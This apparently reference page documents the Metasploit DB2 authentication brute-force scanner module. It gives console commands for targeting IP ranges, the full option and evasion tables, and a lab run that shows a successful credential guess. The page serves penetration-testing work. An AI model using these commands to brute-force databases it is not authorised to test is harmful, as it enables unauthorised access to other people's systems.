DB2 Authentication Brute Force Utility - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/db2/db2_auth metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: DB2 Authentication Brute Force Utility
Module: auxiliary/scanner/db2/db2_auth
Source code: modules/auxiliary/scanner/db2/db2_auth.rb
Disclosure date: -
Last modification time: 2021-08-31 17:10:07 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 50000
List of CVEs: CVE-1999-0502

This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/db2/db2_auth
msf auxiliary(db2_auth) > show options
    ... show and set options ...
msf auxiliary(db2_auth) > set RHOSTS ip-range
msf auxiliary(db2_auth) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(db2_auth) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(db2_auth) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(db2_auth) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.

More information can be found on the Rapid7 Vulnerability & Exploit Database page

Verification Steps


  1. Start msfconsole
  2. Do: use auxiliary/scanner/db2/db2_auth
  3. Do: set RHOSTS [ip]
  4. Do: run

Scenarios


A run on Kali Linux 2019.3 and DB2 11.5.0.0a


msf > use auxiliary/scanner/db2/db2_auth msf auxiliary/scanner/db2/db2_auth) > show options msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1 msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2 msf auxiliary/scanner/db2/db2_auth) > run [-] 172.17.0.2:50000 - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: ) [-] 172.17.0.2:50000 - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: ) [-] 172.17.0.2:50000 - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: ) [*] 172.17.0.2:50000 - Login Successful: db2inst1:db2pass [*] 172.17.0.2:50000 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/db2/db2_auth auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/db2/db2_auth

msf6 auxiliary(scanner/db2/db2_auth) > show info

       Name: DB2 Authentication Brute Force Utility
     Module: auxiliary/scanner/db2/db2_auth
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  todb <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting                                                                       Required  Description
  ----              ---------------                                                                       --------  -----------
  BLANK_PASSWORDS   false                                                                                 no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                                     yes       How fast to bruteforce, from 0 to 5
  DATABASE          toolsdb                                                                               yes       The name of the target database
  DB_ALL_CREDS      false                                                                                 no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                                 no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                                 no        Add all users in the current database to the list
  PASSWORD                                                                                                no        A specific password to authenticate with
  PASS_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             50000                                                                                 yes       The target port (TCP)
  STOP_ON_SUCCESS   false                                                                                 yes       Stop guessing when a credential works for a host
  THREADS           1                                                                                     yes       The number of concurrent threads (max one per host)
  USERNAME                                                                                                no        A specific username to authenticate as
  USERPASS_FILE     /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
  USER_AS_PASS      false                                                                                 no        Try the username as the password for all users
  USER_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_user.txt      no        File containing users, one per line
  VERBOSE           true                                                                                  yes       Whether to print output for all attempts

Description:
  This module attempts to authenticate against a DB2 instance using 
  username and password combinations indicated by the USER_FILE, 
  PASS_FILE, and USERPASS_FILE options.

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0502

Module Options


This is a complete list of options available in the scanner/db2/db2_auth auxiliary module:

msf6 auxiliary(scanner/db2/db2_auth) > show options

Module options (auxiliary/scanner/db2/db2_auth):

   Name              Current Setting                                                                       Required  Description
   ----              ---------------                                                                       --------  -----------
   BLANK_PASSWORDS   false                                                                                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                                     yes       How fast to bruteforce, from 0 to 5
   DATABASE          toolsdb                                                                               yes       The name of the target database
   DB_ALL_CREDS      false                                                                                 no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                                 no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                                 no        Add all users in the current database to the list
   PASSWORD                                                                                                no        A specific password to authenticate with
   PASS_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             50000                                                                                 yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                                                                 yes       Stop guessing when a credential works for a host
   THREADS           1                                                                                     yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                                no        A specific username to authenticate as
   USERPASS_FILE     /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                                 no        Try the username as the password for all users
   USER_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/db2_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                                  yes       Whether to print output for all attempts

Advanced Options


Here is a complete list of advanced options supported by the scanner/db2/db2_auth auxiliary module:

msf6 auxiliary(scanner/db2/db2_auth) > show advanced

Module advanced options (auxiliary/scanner/db2/db2_auth):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CHOST                                  no        The local client address
   CPORT                                  no        The local client port
   ConnectTimeout        10               yes       Maximum number of seconds to establish a TCP connection
   MaxGuessesPerService  0                no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
   MaxGuessesPerUser     0                no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:
                                                    22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.
   MaxMinutesPerService  0                no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
   REMOVE_PASS_FILE      false            yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE  false            yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE      false            yes       Automatically delete the USER_FILE on module completion
   SSL                   false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                              no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode         PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion            Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true             yes       Display progress messages during a scan
   ShowProgressPercent   10               yes       The interval in percent that progress should be shown
   TRANSITION_DELAY      0                no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
   WORKSPACE                              no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/db2/db2_auth module can do:

msf6 auxiliary(scanner/db2/db2_auth) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/db2/db2_auth auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/db2/db2_auth) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL> (<RESULT.STATUS>: <RESULT.PROOF>)


Here is a relevant code snippet related to the "<IP>:<RPORT> - LOGIN FAILED: <RESULT.CREDENTIAL> (<RESULT.STATUS>: <RESULT.PROOF>)" error message:

78:	        credential_data[:core] = credential_core
79:	        create_credential_login(credential_data)
80:	
81:	        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
82:	      else
83:	        invalidate_login(credential_data)
84:	        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
85:	      end
86:	    end
87:	  end
88:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • todb

Version


This page has been produced using Metasploit Framework version 6.1.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.